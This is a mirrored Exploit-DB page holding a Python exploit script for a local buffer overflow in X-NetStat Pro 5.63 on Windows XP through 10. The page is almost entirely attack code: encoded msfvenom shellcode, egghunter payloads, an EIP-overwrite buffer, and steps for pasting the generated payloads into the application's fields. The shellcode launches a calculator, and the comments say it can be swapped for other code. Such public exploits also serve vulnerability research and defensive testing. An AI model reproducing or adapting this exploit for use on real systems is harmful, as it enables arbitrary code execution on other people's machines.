X-NetStat Pro 5.63 – Local Buffer Overflow

• Exploit Database
• 118 阅读

• 作者： Peyman Forouzan
  日期： 2019-03-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46596/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134

  #!/usr/bin/env python #---------------------------------------------------------------------------------------------------------# # Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter) # # Date: 2019-03-23# # Author: Peyman Forouzan # # Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit# # Vendor Homepage: https://freshsoftware.com# # Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe# # Version: 5.63 # # Special Thanks to my wife # # The program has Local Buffer Overflow in several places.# # Note: Although there are even more simple codes to this vulnerability,# # this technique (EggHunter) has been used to run vulnerability in different windows versions.# # Steps : # #1- Run python code : X-NetStat.py ( Three files are created )# #2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL" # # --> Enter --> Close HTTP Client window. # #3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt# # or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok # # --> Wait a litle --> Shellcode (Calc) open# # Also Instead of the third stage you can : # # File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt# # or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" --># # Then Press Open file (Folder) Icon --> Wait a litle --> Shellcode (Calc) open # #---------------------------------------------------------------------------------------------------------# # "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite # #---------------------------------------------------------------------------------------------------------#   #------------------------------------ EGG Shellcode Generation---------------------------------------   #msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg # ( Can be replaced with Shellcode ) egg ="w00tw00t" egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71" egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b" egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43" egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57" egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75" egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f" egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43" egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c" egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33" egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31" egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31" egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31" egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58" egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d" egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52" egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36" egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43" egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50" egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33" egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f" egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31" egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50" egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72" egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35" egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f" egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a" egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73" egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43" egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44" egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"   f = open ("egg.txt", "w") f.write(egg) f.close()   #--------------------------------- EGG Hunter Shellcode Generation-----------------------------------   #encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters   # EggHunter - Modified Version for Winxp and Win7 (32-64 bit) egghunter ="\x4c\x4c\x4c\x4c\x5f" egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47" egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41" egghunter += "\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c" egghunter += "\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38" egghunter += "\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63" egghunter += "\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f" egghunter += "\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50" egghunter += "\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d" egghunter += "\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56" egghunter += "\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44" egghunter += "\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54" egghunter += "\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75" egghunter += "\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70" egghunter += "\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51" egghunter += "\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41"   # EggHunter - Modified Version for Windows10 (32-64 bit) egghunter10 ="\x4c\x4c\x4c\x4c\x5f" egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a" egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51" egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42" egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a" egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50" egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55" egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50" egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55" egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76" egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50" egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31" egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d" egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58" egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a" egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31" egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71" egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f" egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55" egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57" egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c" egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c" egghunter10 += "\x6b\x4f\x68\x67\x41\x41"   eip = "\x77\x5a\x46"   buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip # Direct Eip Overflow   f = open ("egghunter-winxp-win7.txt", "w") f.write(buffer) f.close() buffer = egghunter10 + "\x41" * (264 - len(egghunter10)) + eip # Direct Eip Overflow f2 = open ("egghunter-win10.txt", "w") f2.write(buffer) f2.close()